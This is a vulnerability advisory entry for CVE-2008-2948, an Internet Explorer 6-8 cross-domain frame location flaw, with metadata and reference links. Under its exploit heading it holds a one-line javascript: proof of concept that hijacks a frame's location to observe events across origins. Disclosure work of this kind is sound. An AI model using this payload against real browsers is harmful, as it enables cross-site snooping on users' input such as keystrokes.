Microsoft IE 7/8 Frame Location Property Cross-Domain Vulnerability

Vulnerability ID: 1115571
Vulnerability type: Other
Published: 2008-06-27
Updated: 2008-06-30
CVE ID: CVE-2008-2948
CNNVD-ID: CNNVD-200806-435
Platform: Windows
CVSS score: 6.8
|Vulnerability source
https://www.exploit-db.com/exploits/31996
https://www.securityfocus.com/bid/84919
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-435
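|Vulnerability details
Microsoft Internet Explorer has a cross-domain vulnerability. A remote attacker can change the location property of a frame via the Object data type and use a frame from a different domain to observe events that are not restricted by domain, for example observing onkeydown events with caballero-listener.
|Vulnerability exploit (EXP)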
source: http://www.securityfocus.com/bid/29986/info

Microsoft Internet Explorer is prone to a cross-domain scripting security-bypass vulnerability because the application fails to properly enforce the same-origin policy.

An attacker can exploit this issue to change the location of a frame from a different domain. This allows the attacker to execute arbitrary code in a frame of the same window as content from a different domain. Successful exploits will allow the attacker to access information from the parent document via DOM components that are not domain-reliant (such as the 'onmousedown' event).

Internet Explorer 6, 7, and 8 Beta 1 are vulnerable; other versions may also be affected. 

javascript:x=open('http://example.com/');setInterval(function(){try{x.frames[0].location={toString:function(){return 'http://www.example2.com/somescript.html';}}}catch(e){}},5000);void(1);
|Affected products
Microsoft Internet Explorer Macintosh Edition 8 Microsoft Internet Explorer 7.0 + Microsoft Windows Server 2003 Sp2 X64 + Microsoft Windows Server
|References

Source: US-CERT
Name: VU#516627
Link: http://www.kb.cert.org/vuls/id/516627
Source: MISC
Link: http://www.gnucitizen.org/blog/ghost-busters/
Source: VUPEN
Name: ADV-2008-1941
Link: http://www.frsirt.com/english/advisories/2008/1941/references
Source: MISC
Link: http://technet.microsoft.com/en-us/security/cc405107.aspx#EHD
Source: MISC
Link: http://sirdarckcat.blogspot.com/2008/05/ghosts-for-ie8-and-ie75730.html
Source: SECUNIA
Name: 30851
Link: http://secunia.com/advisories/30851
Source: MISC
Link: http://blogs.zdnet.com/security/?p=1348